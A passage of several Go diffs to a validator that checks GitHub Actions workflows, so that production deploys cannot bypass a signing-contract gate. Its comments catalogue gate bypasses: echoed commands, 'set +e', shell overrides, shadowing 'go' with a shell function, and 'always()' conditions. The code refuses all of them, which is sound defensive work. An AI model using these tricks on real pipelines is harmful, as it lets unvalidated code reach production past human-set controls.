+	ci, err := os.ReadFile(ciPath) //nolint:gosec // Derived from the explicit workflow path.
+	if err != nil {
+		_, _ = fmt.Fprintf(stderr, "dr publication contract: read merge-queue workflow: %v\n", err)
+		return 1
+	}
+	if err := validateProductionRoutes(string(ci)); err != nil {
 		_, _ = fmt.Fprintf(stderr, "dr publication contract: %v\n", err)
 		return 1
 	}

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -25,6 +25,7 @@ import (
 	"io"
 	"os"
 	"path/filepath"
+	"slices"
 	"strings"
 
 	"gopkg.in/yaml.v3"
@@ -43,10 +44,34 @@ const cdContractGateJob = "validate-publication-contract"
 
 // The exact action paths and command the direct-push gate must wire together.
 // Named once so the checks, the workflow, and the error text cannot drift.
+// mergeQueueProductionJob is a ci.yaml job that reaches production, together
+// with whether its PURPOSE requires it to survive a failed dependency.
+type mergeQueueProductionJob struct {
+	name string
+	// mayOverrideDependencyStatus is true only where running after a failed
+	// dependency is the job's entire reason to exist. Everywhere else a status
+	// function makes a publishing job eligible after the gate before it FAILED,
+	// which is the bypass this distinction exists to refuse.
+	mayOverrideDependencyStatus bool
+}
+
 // mergeQueueProductionJobs are the ci.yaml jobs that reach production. Both
 // must go through the checked shared action, or the ordering contract covers
 // only the direct-push route.
-var mergeQueueProductionJobs = []string{"deploy-prod", "heal-prod-on-failure"}
+var mergeQueueProductionJobs = []mergeQueueProductionJob{
+	{name: "deploy-prod"},
+	// The unsuccessful-path cleanup: it re-deploys main's signed artifact after
+	// deploy-prod fails or is cancelled, so `always()` is REQUIRED here and
+	// refusing it would break the healing this repo added deliberately.
+	{name: "heal-prod-on-failure", mayOverrideDependencyStatus: true},
+}
+
+// dependencyStatusOverrides are the GitHub status-check functions that make a
+// job eligible even when a job it `needs` has failed. Without one of them a
+// job runs only if every dependency succeeded, which is the property the
+// merge-queue gate relies on; `success()` is absent because it asserts that
+// property rather than overriding it.
+var dependencyStatusOverrides = []string{"always(", "failure(", "cancelled("}
 
 const (
 	sharedDeployAction    = "./.github/actions/deploy-prod"
@@ -258,7 +283,9 @@ func validateCDWiring(cd string, deployAction string) error {
 	if err != nil {
 		return err
 	}
-	if err := runBlockIsSimpleSequence(documents, gate, step, cdContractGateJob); err != nil {
+	if err := runBlockRunsOnlyAllowedCommands(
+		documents, gate, step, cdContractGateJob, gateRunBlockCommands,
+	); err != nil {
 		return err
 	}
 	// The gate JOB is the same question one level up: a skipped or
@@ -311,7 +338,8 @@ func validateProductionRoutes(ci string) error {
 	if !ok {
 		return errors.New("merge-queue workflow has no jobs mapping")
 	}
-	for _, jobName := range mergeQueueProductionJobs {
+	for _, production := range mergeQueueProductionJobs {
+		jobName := production.name
 		job, ok := jobs[jobName].(map[string]any)
 		if !ok {
 			return fmt.Errorf("merge-queue workflow is missing the %s job", jobName)
@@ -325,6 +353,44 @@ func validateProductionRoutes(ci string) error {
 			"the deploy step in merge-queue job "+jobName,
 		); err != nil {
 			return err
+		}
+		if err := refuseDependencyStatusOverride(job, production); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// refuseDependencyStatusOverride is the merge-queue counterpart to the
+// direct-push route's flat refusal of any job-level condition.
+//
+// 🔴 THAT CARVE-OUT WAS TOTAL, AND THAT WAS THE BUG. This route permits a
+// condition because `merge_group` gating is legitimate and necessary — but
+// permitting the key permitted its CONTENTS too, so `always() && <the real
+// condition>` read as correct while making the deploy eligible after the
+// `changes` job, which runs the signing validator, had failed. The condition is
+// therefore permitted and its status functions refused, rather than the key
+// being trusted whole.
+func refuseDependencyStatusOverride(job map[string]any, production mergeQueueProductionJob) error {
+	if production.mayOverrideDependencyStatus {
+		return nil
+	}
+	condition, present := job["if"]
+	if !present {
+		return nil
+	}
+	// Whitespace and case are removed rather than matched around: GitHub's
+	// expression functions are case-insensitive, and a spelling this cannot
+	// read must not fall through to accepted.
+	normalised := strings.ToLower(strings.Join(strings.Fields(fmt.Sprintf("%v", condition)), ""))
+	for _, override := range dependencyStatusOverrides {
+		if strings.Contains(normalised, override) {
+			return fmt.Errorf(
+				"merge-queue job %s conditions its run on %s), which makes it eligible even when a job it "+
+					"`needs` has FAILED — including the job that runs the publication validator, so it can "+
+					"publish to production behind a gate that already failed (condition: %v)",
+				production.name, override, condition,
+			)
 		}
 	}
 	return nil
@@ -428,62 +494,40 @@ func enforcesFailure(node map[string]any, description string) error {
 	return nil
 }
 
-// shellControlFlow are the tokens that make a run block something other than a
-// straight-line sequence of commands. Any of them means the check can no longer
-// say the validator is reached.
-// Keywords are matched as WORDS, operators as substrings. `strings.Contains`
-// on the keywords was wrong in a way whose failure direction is safe but whose
-// MESSAGE lies: `docker buildx …` contains "do" and `gh run download` contains
-// "do" too, so a legitimate step was rejected naming a token it does not use.
-// A guard that refuses correct work with a false explanation is a guard people
-// learn to route around.
-var (
-	shellKeywords = []string{
-		"if", "then", "else", "elif", "fi",
-		"for", "while", "until", "do", "done",
-		"case", "esac", "exit", "return", "trap", "eval", "source",
-		// 🔴 `set` is here for the FIFTH shape of "does the command count":
-		// `set +e` runs the validator, discards its failure, and lets a later
-		// succeeding line carry the step to exit 0. The command executes and
-		// its verdict is thrown away. Every `set` is refused rather than only
-		// the disabling forms: GitHub already runs `run:` under `bash -e`, so a
-		// gate has no reason to touch failure modes, and enumerating the safe
-		// spellings is the guessing game the rest of this file avoids.
-		"set",
-	}
-	// Redirection and here-docs belong here for the same reason the chaining
-	// operators do: `cat <<'EOF' … EOF` contains the validator line verbatim
-	// while the step only PRINTS it. Reported against the previous head, where
-	// the mutation passed and the contract reported success.
-	shellOperators = []string{"&&", "||", ";", "|", "`", "$(", "<<", "<", ">"}
-)
-
-// shellWords splits a line on whitespace, which is enough to tell the keyword
-// `do` from the command `docker`. It is not a shell lexer and does not need to
-// be: anything it cannot separate stays in one token and simply fails to match
-// a keyword, which leaves the line accepted only if it also carries no
-// operator — and the operator set is what quoting and substitution live in.
-func shellWords(line string) []string {
-	return strings.Fields(line)
+// gateRunBlockCommands are the ONLY command lines the publication-contract
+// gate's run block may contain. Named here so the check, the workflow, and the
+// error text cannot drift apart.
+var gateRunBlockCommands = []string{
+	"go test ./scripts/validate-dr-signing",
+	validatorCommand,
 }
 
-// runBlockIsSimpleSequence requires the gate step to be a straight-line
-// sequence of commands, so that finding the validator line also means the shell
-// reaches it.
+// runBlockRunsOnlyAllowedCommands requires every executable line of the gate
+// step to be one of `allowed`, so that finding the validator line also means
+// the shell reaches it and runs it as itself.
 //
-// 🔴 THE THIRD SHAPE OF THE SAME QUESTION. Whole-line equality closed "the
-// command is quoted inside another command"; step metadata closed "the step is
-// skipped or its failure suppressed"; neither says the shell EXECUTES the line.
-// `exit 0` above it, or `if false; then <command>; fi` around it, both leave the
-// exact line present while running nothing.
+// 🔴 THIS REPLACED A DENYLIST, AND THE REPLACEMENT IS THE POINT. Six rounds of
+// review found six ways to leave the exact validator line present while running
+// nothing: quoting it inside another command, skipping the step, sitting after
+// `exit 0`, printing it from a here-doc, discarding its verdict with `set +e`,
+// and — reported independently by two reviewers against the previous head —
+// shadowing `go` with a shell function, since bash resolves a function before
+// an executable. Each round answered with another refused token.
 //
-// Properly answering "is this line reached" is a shell interpreter, which does
-// not belong in a workflow guard. So the run block is instead constrained to a
-// shape where the question does not arise: no control flow, no early exit, no
-// chaining. That is deliberately narrow, and narrow in the SAFE direction — a
-// legitimate gate that needs a conditional will fail this check and have to
-// justify itself, rather than a skipped one passing quietly.
-func runBlockIsSimpleSequence(workflow map[string]any, job map[string]any, step map[string]any, jobName string) error {
+// A denylist over shell syntax is an unbounded guessing game, and the sixth
+// round is the evidence: `go()`, `{` and `}` carried no refused keyword and no
+// refused operator, so a gate that ran neither validator was accepted. Rather
+// than add a seventh token and wait for the eighth shape, the run block is
+// constrained to an ALLOWLIST of exact command lines. Every bypass above needs
+// a line that is not one of the two required commands, so none of them is
+// expressible — including the ones nobody has thought of yet.
+//
+// Deliberately narrow, and narrow in the SAFE direction: a gate that grows a
+// legitimate third line fails this check and has to add it here, which is a
+// reviewed act, rather than a gate that runs nothing passing quietly.
+func runBlockRunsOnlyAllowedCommands(
+	workflow map[string]any, job map[string]any, step map[string]any, jobName string, allowed []string,
+) error {
 	if err := refuseShellOverride(workflow, job, step, jobName); err != nil {
 		return err
 	}
@@ -493,17 +537,8 @@ func runBlockIsSimpleSequence(workflow map[string]any, job map[string]any, step 
 		if trimmed == "" || strings.HasPrefix(trimmed, "#") {
 			continue
 		}
-		for _, word := range shellWords(trimmed) {
-			for _, keyword := range shellKeywords {
-				if word == keyword {
-					return controlFlowError(jobName, keyword, trimmed)
-				}
-			}
-		}
-		for _, operator := range shellOperators {
-			if strings.Contains(trimmed, operator) {
-				return controlFlowError(jobName, operator, trimmed)
-			}
+		if !slices.Contains(allowed, trimmed) {
+			return disallowedGateCommandError(jobName, trimmed, allowed)
 		}
 	}
 	return nil
@@ -575,12 +610,12 @@ func refuseShellOverride(workflow map[string]any, job map[string]any, step map[s
 	return nil
 }
 
-func controlFlowError(jobName string, token string, line string) error {
+func disallowedGateCommandError(jobName string, line string, allowed []string) error {
 	return fmt.Errorf(
-		"the validator step in %s uses shell control flow or chaining (%q in %q); "+
-			"the gate must be a straight-line sequence of commands, or finding the validator line "+
-			"does not establish that the shell reaches it",
-		jobName, token, line,
+		"the validator step in %s runs %q, which is not one of the commands this gate may contain (%s); "+
+			"an extra line can leave the validator present while the shell never runs it, so the gate is "+
+			"restricted to exactly these commands — add the line here if it genuinely belongs",
+		jobName, line, strings.Join(allowed, ", "),
 	)
 }
 

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -34,6 +34,11 @@ import (
 // DR-published artifact.
 const drIdentitySubject = `^https://github\.com/devantler-tech/platform/\.github/workflows/dr-rebuild\.yaml@refs/heads/main$`
 
+// cdContractGateJob is the cd.yaml job that runs this validator on the
+// direct-push production path. Named once so the wiring check and the workflow
+// cannot drift apart silently.
+const cdContractGateJob = "validate-publication-contract"
+
 func validateDRWorkflow(workflow string) error {
 	job, ok := extractJob(workflow, "  rebuild:")
 	if !ok {
@@ -134,6 +139,93 @@ func validateVerifyAllowList(config string) error {
 	return nil
 }
 
+// validateCDWiring checks that the direct-push production path cannot deploy
+// without this contract having been checked first.
+//
+// The contract above is only as strong as the weakest route to production, and
+// there are two. The merge-queue route runs this validator through ci.yaml,
+// which triggers on pull_request and merge_group. cd.yaml's documented
+// direct-push recovery route has neither event: it is dispatched manually after
+// a push to main, went straight from the authorization job into the shared
+// deploy action, and so reached production without the ordering contract being
+// examined even once.
+//
+// That is the same failure the authorization gate in cd.yaml already exists to
+// prevent, one property along — which is why the fix is the same shape: a
+// separate job before the deploy, not a step folded into the shared action,
+// because that action runs inside the prod environment with deploy secrets in
+// scope and a gate belongs before that.
+//
+// Checking the wiring HERE is deliberate. A gate the destructive job does not
+// depend on protects nothing, and the wiring is exactly the part that goes
+// missing silently: removing the `needs:` entry breaks no test, fails no lint,
+// and leaves a workflow that still looks gated because the job is still there.
+func validateCDWiring(cd string) error {
+	deploy, ok := extractJob(cd, "  deploy-prod:")
+	if !ok {
+		return errors.New("missing deploy-prod job in the direct-push production workflow")
+	}
+	// If the deploy job stops delegating to the shared action, this check is
+	// aimed at the wrong thing and must be re-aimed rather than left passing.
+	if !containsLine(deploy, "uses: ./.github/actions/deploy-prod") {
+		return errors.New(
+			"deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names",
+		)
+	}
+	gate, ok := extractJob(cd, "  "+cdContractGateJob+":")
+	if !ok {
+		return fmt.Errorf(
+			"missing %s job: the direct-push production path has no publication-contract gate",
+			cdContractGateJob,
+		)
+	}
+	if !containsLine(gate, "go run ./scripts/validate-dr-signing") {
+		return fmt.Errorf("%s job does not run the publication contract validator", cdContractGateJob)
+	}
+	needs, ok := jobNeeds(deploy)
+	if !ok {
+		return errors.New(
+			"deploy-prod job has no inline needs: [...] declaration, so its gating cannot be established",
+		)
+	}
+	for _, need := range needs {
+		if need == cdContractGateJob {
+			return nil
+		}
+	}
+	return fmt.Errorf(
+		"deploy-prod does not require %s, so a direct-push deploy can reach production without the publication contract",
+		cdContractGateJob,
+	)
+}
+
+// jobNeeds returns the job names of an inline `needs: [a, b]` declaration.
+//
+// The block form is deliberately NOT parsed. This helper decides whether a
+// destructive job can run without its gate, so a shape it cannot read must
+// report "not established" rather than be guessed at — an unrecognised shape
+// reading as "wired" is the one failure mode that matters here.
+func jobNeeds(job string) ([]string, bool) {
+	for _, line := range strings.Split(job, "\n") {
+		trimmed := strings.TrimSpace(line)
+		if !strings.HasPrefix(trimmed, "needs:") {
+			continue
+		}
+		value := strings.TrimSpace(strings.TrimPrefix(trimmed, "needs:"))
+		if !strings.HasPrefix(value, "[") || !strings.HasSuffix(value, "]") {
+			return nil, false
+		}
+		var names []string
+		for _, part := range strings.Split(strings.TrimSuffix(strings.TrimPrefix(value, "["), "]"), ",") {
+			if part = strings.TrimSpace(part); part != "" {
+				names = append(names, part)
+			}
+		}
+		return names, len(names) > 0
+	}
+	return nil, false
+}
+
 func extractJob(workflow string, header string) (string, bool) {
 	lines := strings.Split(workflow, "\n")
 	start := -1
@@ -217,6 +309,19 @@ func run(workflowPath string, configPath string, stdout io.Writer, stderr io.Wri
 		return 1
 	}
 	if err := validateVerifyAllowList(string(config)); err != nil {
+		_, _ = fmt.Fprintf(stderr, "dr publication contract: %v\n", err)
+		return 1
+	}
+	// Derived from the workflow path, exactly as the publication action above
+	// is — keeping the CLI at two arguments so no caller can run a partial
+	// contract by passing fewer paths.
+	cdPath := filepath.Clean(filepath.Join(filepath.Dir(workflowPath), "cd.yaml"))
+	cd, err := os.ReadFile(cdPath) //nolint:gosec // Derived from the explicit workflow path.
+	if err != nil {
+		_, _ = fmt.Fprintf(stderr, "dr publication contract: read direct-push deploy workflow: %v\n", err)
+		return 1
+	}
+	if err := validateCDWiring(string(cd)); err != nil {
 		_, _ = fmt.Fprintf(stderr, "dr publication contract: %v\n", err)
 		return 1
 	}

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -26,6 +26,8 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
+
+	"gopkg.in/yaml.v3"
 )
 
 // drIdentitySubject is the Fulcio certificate subject the DR rebuild signs
@@ -38,6 +40,14 @@ const drIdentitySubject = `^https://github\.com/devantler-tech/platform/\.github
 // direct-push production path. Named once so the wiring check and the workflow
 // cannot drift apart silently.
 const cdContractGateJob = "validate-publication-contract"
+
+// The exact action paths and command the direct-push gate must wire together.
+// Named once so the checks, the workflow, and the error text cannot drift.
+const (
+	sharedDeployAction    = "./.github/actions/deploy-prod"
+	nestedPublisherAction = "./.github/actions/deploy-prod/publish-platform-manifests"
+	validatorCommand      = "go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml"
+)
 
 func validateDRWorkflow(workflow string) error {
 	job, ok := extractJob(workflow, "  rebuild:")
@@ -140,96 +150,174 @@ func validateVerifyAllowList(config string) error {
 }
 
 // validateCDWiring checks that the direct-push production path cannot deploy
-// without this contract having been checked first.
+// without this contract having been checked first, and that the contract is
+// checked against the code that route actually runs.
 //
 // The contract above is only as strong as the weakest route to production, and
 // there are two. The merge-queue route runs this validator through ci.yaml,
-// which triggers on pull_request and merge_group. cd.yaml's documented
-// direct-push recovery route has neither event: it is dispatched manually after
-// a push to main, went straight from the authorization job into the shared
-// deploy action, and so reached production without the ordering contract being
-// examined even once.
+// which triggers on pull_request and merge_group. cd.yaml is the documented
+// direct-push recovery route and has neither event: it is dispatched manually
+// after a push to main, went straight from the authorization job into the
+// shared deploy action, and so reached production without the ordering contract
+// being examined even once.
 //
-// That is the same failure the authorization gate in cd.yaml already exists to
-// prevent, one property along — which is why the fix is the same shape: a
-// separate job before the deploy, not a step folded into the shared action,
-// because that action runs inside the prod environment with deploy secrets in
-// scope and a gate belongs before that.
+// 🔴 THE WORKFLOW IS PARSED, NOT SCANNED, and that is the whole point of this
+// function rather than an implementation preference. Four ways a text scan says
+// "gated" about a workflow that is not, each raised against the scanning
+// version of this check and each reproduced as an ablation below:
 //
-// Checking the wiring HERE is deliberate. A gate the destructive job does not
-// depend on protects nothing, and the wiring is exactly the part that goes
-// missing silently: removing the `needs:` entry breaks no test, fails no lint,
-// and leaves a workflow that still looks gated because the job is still there.
-func validateCDWiring(cd string) error {
-	deploy, ok := extractJob(cd, "  deploy-prod:")
+//  1. The gate step ECHOES the command instead of running it. A substring match
+//     on the run block accepts `echo "go run ./scripts/validate-dr-signing"`,
+//     which exits 0 having validated nothing.
+//  2. The dependency is read from ANY line of the job text, so a heredoc or an
+//     env value containing `needs: [validate-publication-contract]` satisfies
+//     it while GitHub sees no dependency at all.
+//  3. `needs` is satisfied but the deploy carries `if: always()`, which
+//     schedules it after the gate FAILS. Membership alone cannot see this, and
+//     it is the most dangerous of the four because the workflow reads correct.
+//  4. The contract is checked against the nested publisher while the top-level
+//     deploy action no longer invokes it — so the validator keeps verifying an
+//     unused file and reports success about code that does not run.
+//
+// A gate the destructive job does not depend on protects nothing; so does a
+// gate it depends on but ignores, and so does a contract checked against code
+// that is no longer reached.
+func validateCDWiring(cd string, deployAction string) error {
+	documents, err := decodeWorkflow(cd)
+	if err != nil {
+		return fmt.Errorf("direct-push deploy workflow does not parse, so its gating cannot be established: %w", err)
+	}
+	jobs, ok := documents["jobs"].(map[string]any)
+	if !ok {
+		return errors.New("direct-push deploy workflow has no jobs mapping")
+	}
+	deploy, ok := jobs["deploy-prod"].(map[string]any)
 	if !ok {
 		return errors.New("missing deploy-prod job in the direct-push production workflow")
 	}
+
 	// If the deploy job stops delegating to the shared action, this check is
 	// aimed at the wrong thing and must be re-aimed rather than left passing.
-	//
-	// Matched as a WHOLE line (modulo indentation), not as a substring. A
-	// substring match is satisfied by `…/deploy-prod-canary` and by the nested
-	// `…/deploy-prod/publish-platform-manifests`, so the tripwire would stay
-	// green across exactly the change it exists to notice — and a tripwire that
-	// survives its own trigger is worse than none, because it reads as checked.
-	if !containsTrimmedLine(deploy, "uses: ./.github/actions/deploy-prod") {
+	// Compared as a whole step value, so neither a sibling path
+	// (`…/deploy-prod-canary`) nor the nested publisher satisfies it.
+	if !jobUsesAction(deploy, sharedDeployAction) {
 		return errors.New(
 			"deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names",
 		)
 	}
-	gate, ok := extractJob(cd, "  "+cdContractGateJob+":")
+
+	// (4) The contract is validated against the nested publisher. That is only
+	// meaningful while the shared action still calls it.
+	if !containsTrimmedLine(deployAction, "uses: "+nestedPublisherAction) {
+		return fmt.Errorf(
+			"the shared deploy action no longer invokes %s, so the publication contract is being checked against code production does not run",
+			nestedPublisherAction,
+		)
+	}
+
+	gate, ok := jobs[cdContractGateJob].(map[string]any)
 	if !ok {
 		return fmt.Errorf(
 			"missing %s job: the direct-push production path has no publication-contract gate",
 			cdContractGateJob,
 		)
 	}
-	if !containsLine(gate, "go run ./scripts/validate-dr-signing") {
-		return fmt.Errorf("%s job does not run the publication contract validator", cdContractGateJob)
-	}
-	needs, ok := jobNeeds(deploy)
-	if !ok {
-		return errors.New(
-			"deploy-prod job has no inline needs: [...] declaration, so its gating cannot be established",
+	// (1) The command must be a complete executable line of a run block, not
+	// text that merely appears inside one.
+	if !jobRunsCommand(gate, validatorCommand) {
+		return fmt.Errorf(
+			"%s job does not EXECUTE %q as its own command line, so the gate can report success without validating anything",
+			cdContractGateJob, validatorCommand,
 		)
 	}
-	for _, need := range needs {
-		if need == cdContractGateJob {
-			return nil
-		}
+
+	// (2) Read from the parsed job, so only a real `needs` key counts.
+	if !stringListContains(deploy["needs"], cdContractGateJob) {
+		return fmt.Errorf(
+			"deploy-prod does not require %s, so a direct-push deploy can reach production without the publication contract",
+			cdContractGateJob,
+		)
 	}
-	return fmt.Errorf(
-		"deploy-prod does not require %s, so a direct-push deploy can reach production without the publication contract",
-		cdContractGateJob,
-	)
+
+	// (3) A job-level condition can schedule the deploy after a FAILED
+	// prerequisite. Anything other than an absent condition is refused rather
+	// than interpreted: this decides whether a destructive job runs, and a
+	// condition expression this cannot evaluate must read as ungated.
+	if condition, present := deploy["if"]; present {
+		return fmt.Errorf(
+			"deploy-prod declares a job-level condition (%v); a condition can schedule the deploy after the gate FAILS, "+
+				"so it must be removed or this check extended to prove the condition still requires the gate to succeed",
+			condition,
+		)
+	}
+	return nil
 }
 
-// jobNeeds returns the job names of an inline `needs: [a, b]` declaration.
+// decodeWorkflow parses a workflow into a generic mapping. `on:` is famously
+// decoded as the boolean true by YAML 1.1 readers; nothing here reads that key,
+// and the jobs mapping is unaffected.
+func decodeWorkflow(contents string) (map[string]any, error) {
+	var document map[string]any
+	if err := yaml.Unmarshal([]byte(contents), &document); err != nil {
+		return nil, err
+	}
+	if document == nil {
+		return nil, errors.New("empty document")
+	}
+	return document, nil
+}
+
+// jobUsesAction reports whether any step of the job has `uses` EXACTLY equal to
+// the wanted action. Equality, not prefix: a sibling or nested path is a
+// different action and must not satisfy a check about this one.
+func jobUsesAction(job map[string]any, want string) bool {
+	steps, _ := job["steps"].([]any)
+	for _, raw := range steps {
+		step, _ := raw.(map[string]any)
+		if uses, _ := step["uses"].(string); strings.TrimSpace(uses) == want {
+			return true
+		}
+	}
+	return false
+}
+
+// jobRunsCommand reports whether any step of the job executes `want` as a
+// complete line of its run block.
 //
-// The block form is deliberately NOT parsed. This helper decides whether a
-// destructive job can run without its gate, so a shape it cannot read must
-// report "not established" rather than be guessed at — an unrecognised shape
-// reading as "wired" is the one failure mode that matters here.
-func jobNeeds(job string) ([]string, bool) {
-	for _, line := range strings.Split(job, "\n") {
-		trimmed := strings.TrimSpace(line)
-		if !strings.HasPrefix(trimmed, "needs:") {
-			continue
-		}
-		value := strings.TrimSpace(strings.TrimPrefix(trimmed, "needs:"))
-		if !strings.HasPrefix(value, "[") || !strings.HasSuffix(value, "]") {
-			return nil, false
-		}
-		var names []string
-		for _, part := range strings.Split(strings.TrimSuffix(strings.TrimPrefix(value, "["), "]"), ",") {
-			if part = strings.TrimSpace(part); part != "" {
-				names = append(names, part)
+// Whole-line equality after trimming is what closes the echo hole: a substring
+// test accepts the command quoted inside another command, which exits 0 having
+// run nothing. This is deliberately strict about the shape rather than clever
+// about shell semantics — a wrapper this cannot recognise reads as ungated,
+// which is the safe direction for a check that guards a production deploy.
+func jobRunsCommand(job map[string]any, want string) bool {
+	steps, _ := job["steps"].([]any)
+	for _, raw := range steps {
+		step, _ := raw.(map[string]any)
+		run, _ := step["run"].(string)
+		for _, line := range strings.Split(run, "\n") {
+			if strings.TrimSpace(line) == want {
+				return true
 			}
 		}
-		return names, len(names) > 0
 	}
-	return nil, false
+	return false
+}
+
+// stringListContains reports whether a parsed YAML value is a sequence (or a
+// lone scalar) containing want. A shape it cannot read returns false, so an
+// unrecognised `needs` declaration reads as ungated.
+func stringListContains(value any, want string) bool {
+	switch typed := value.(type) {
+	case string:
+		return strings.TrimSpace(typed) == want
+	case []any:
+		for _, item := range typed {
+			if name, ok := item.(string); ok && strings.TrimSpace(name) == want {
+				return true
+			}
+		}
+	}
+	return false
 }
 
 func extractJob(workflow string, header string) (string, bool) {
@@ -344,7 +432,15 @@ func run(workflowPath string, configPath string, stdout io.Writer, stderr io.Wri
 		_, _ = fmt.Fprintf(stderr, "dr publication contract: read direct-push deploy workflow: %v\n", err)
 		return 1
 	}
-	if err := validateCDWiring(string(cd)); err != nil {
+	deployActionPath := filepath.Clean(filepath.Join(
+		filepath.Dir(workflowPath), "..", "actions", "deploy-prod", "action.yml",
+	))
+	deployAction, err := os.ReadFile(deployActionPath) //nolint:gosec // Derived from the explicit workflow path.
+	if err != nil {
+		_, _ = fmt.Fprintf(stderr, "dr publication contract: read shared deploy action: %v\n", err)
+		return 1
+	}
+	if err := validateCDWiring(string(cd), string(deployAction)); err != nil {
 		_, _ = fmt.Fprintf(stderr, "dr publication contract: %v\n", err)
 		return 1
 	}

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -258,7 +258,7 @@ func validateCDWiring(cd string, deployAction string) error {
 	if err != nil {
 		return err
 	}
-	if err := runBlockIsSimpleSequence(step, cdContractGateJob); err != nil {
+	if err := runBlockIsSimpleSequence(documents, gate, step, cdContractGateJob); err != nil {
 		return err
 	}
 	// The gate JOB is the same question one level up: a skipped or
@@ -486,17 +486,9 @@ func shellWords(line string) []string {
 // chaining. That is deliberately narrow, and narrow in the SAFE direction — a
 // legitimate gate that needs a conditional will fail this check and have to
 // justify itself, rather than a skipped one passing quietly.
-func runBlockIsSimpleSequence(step map[string]any, jobName string) error {
-	// The same question one key over: a `shell:` override can replace the
-	// default `bash -e {0}` with one that does not stop on error, which
-	// discards the validator verdict exactly as `set +e` does. Refused rather
-	// than parsed, for the reason every other branch here gives.
-	if shell, present := step["shell"]; present {
-		return fmt.Errorf(
-			"the validator step in %s overrides the shell (%v); the default already stops on error, "+
-				"and an override can discard the validator failure the gate exists to surface",
-			jobName, shell,
-		)
+func runBlockIsSimpleSequence(workflow map[string]any, job map[string]any, step map[string]any, jobName string) error {
+	if err := refuseShellOverride(workflow, job, step, jobName); err != nil {
+		return err
 	}
 	run, _ := step["run"].(string)
 	for _, line := range strings.Split(run, "\n") {
@@ -515,6 +507,65 @@ func runBlockIsSimpleSequence(step map[string]any, jobName string) error {
 			if strings.Contains(trimmed, operator) {
 				return controlFlowError(jobName, operator, trimmed)
 			}
+		}
+	}
+	return nil
+}
+
+// shellSetting reads the shell configured at ONE scope. A step carries it
+// directly; a workflow and a job carry it under `defaults.run`. A shape this
+// cannot read returns absent, which is the same fail-closed direction the rest
+// of this file takes: an unreadable declaration must not read as "no override".
+func shellSetting(node map[string]any, viaDefaults bool) (any, bool) {
+	if node == nil {
+		return nil, false
+	}
+	if !viaDefaults {
+		shell, present := node["shell"]
+		return shell, present
+	}
+	defaults, _ := node["defaults"].(map[string]any)
+	if defaults == nil {
+		return nil, false
+	}
+	run, _ := defaults["run"].(map[string]any)
+	if run == nil {
+		return nil, false
+	}
+	shell, present := run["shell"]
+	return shell, present
+}
+
+// refuseShellOverride rejects a shell setting at ANY scope GitHub applies to
+// the gate step.
+//
+// 🔴 THE FOURTH SHAPE OF "does the validator's verdict survive", and the third
+// time this exact class has been fixed at one site while another stayed open.
+// A `shell:` override replaces the default `bash -e {0}` with one that does not
+// stop on error, so a failing validator no longer ends the step and a later
+// succeeding line carries it to exit 0 — `set +e` by another name. Refusing
+// only `steps[*].shell` left BOTH `defaults.run.shell` scopes open, and GitHub
+// applies workflow defaults, then job defaults, then the step.
+//
+// So the scopes are a parameter LIST rather than a sequence of ifs: every
+// caller must supply all three, and a fourth scope is a signature change the
+// compiler enforces, not a site somebody remembers to visit.
+func refuseShellOverride(workflow map[string]any, job map[string]any, step map[string]any, jobName string) error {
+	for _, scope := range []struct {
+		description string
+		node        map[string]any
+		viaDefaults bool
+	}{
+		{"the workflow sets defaults.run.shell", workflow, true},
+		{fmt.Sprintf("the %s job sets defaults.run.shell", jobName), job, true},
+		{fmt.Sprintf("the validator step in %s overrides the shell", jobName), step, false},
+	} {
+		if shell, present := shellSetting(scope.node, scope.viaDefaults); present {
+			return fmt.Errorf(
+				"%s (%v); the default already stops on error, and an override can discard "+
+					"the validator failure the gate exists to surface",
+				scope.description, shell,
+			)
 		}
 	}
 	return nil

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -344,9 +344,6 @@ func decodeWorkflow(contents string) (map[string]any, error) {
 	return document, nil
 }
 
-// jobUsesAction reports whether any step of the job has `uses` EXACTLY equal to
-// the wanted action. Equality, not prefix: a sibling or nested path is a
-// different action and must not satisfy a check about this one.
 // requireEnforcedStep finds a step and proves it is enforced, in ONE call.
 //
 // 🔴 MATCHING AND ENFORCING ARE DELIBERATELY INSEPARABLE HERE. Every reviewed
@@ -513,9 +510,16 @@ func runBlockIsSimpleSequence(workflow map[string]any, job map[string]any, step 
 }
 
 // shellSetting reads the shell configured at ONE scope. A step carries it
-// directly; a workflow and a job carry it under `defaults.run`. A shape this
-// cannot read returns absent, which is the same fail-closed direction the rest
-// of this file takes: an unreadable declaration must not read as "no override".
+// directly; a workflow and a job carry it under `defaults.run`.
+//
+// A shape this cannot read returns absent, and absent means the CALLER ACCEPTS —
+// so this helper is deliberately not fail-closed the way stringListContains is,
+// and the reason is specific rather than a house style. GitHub only applies
+// `defaults.run.shell` when `defaults` and `run` are both mappings carrying that
+// key; anything else is not a working override either, so there is no bypass for
+// refusing to read it. Stated explicitly because the earlier draft of this
+// comment claimed the opposite direction, and a later round would otherwise
+// tighten the code against a guarantee it never made.
 func shellSetting(node map[string]any, viaDefaults bool) (any, bool) {
 	if node == nil {
 		return nil, false

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -71,7 +71,7 @@ var mergeQueueProductionJobs = []mergeQueueProductionJob{
 // job runs only if every dependency succeeded, which is the property the
 // merge-queue gate relies on; `success()` is absent because it asserts that
 // property rather than overriding it.
-var dependencyStatusOverrides = []string{"always(", "failure(", "cancelled("}
+var dependencyStatusOverrides = []string{"always", "failure", "cancelled"}
 
 const (
 	sharedDeployAction    = "./.github/actions/deploy-prod"
@@ -384,9 +384,12 @@ func refuseDependencyStatusOverride(job map[string]any, production mergeQueuePro
 	// read must not fall through to accepted.
 	normalised := strings.ToLower(strings.Join(strings.Fields(fmt.Sprintf("%v", condition)), ""))
 	for _, override := range dependencyStatusOverrides {
-		if strings.Contains(normalised, override) {
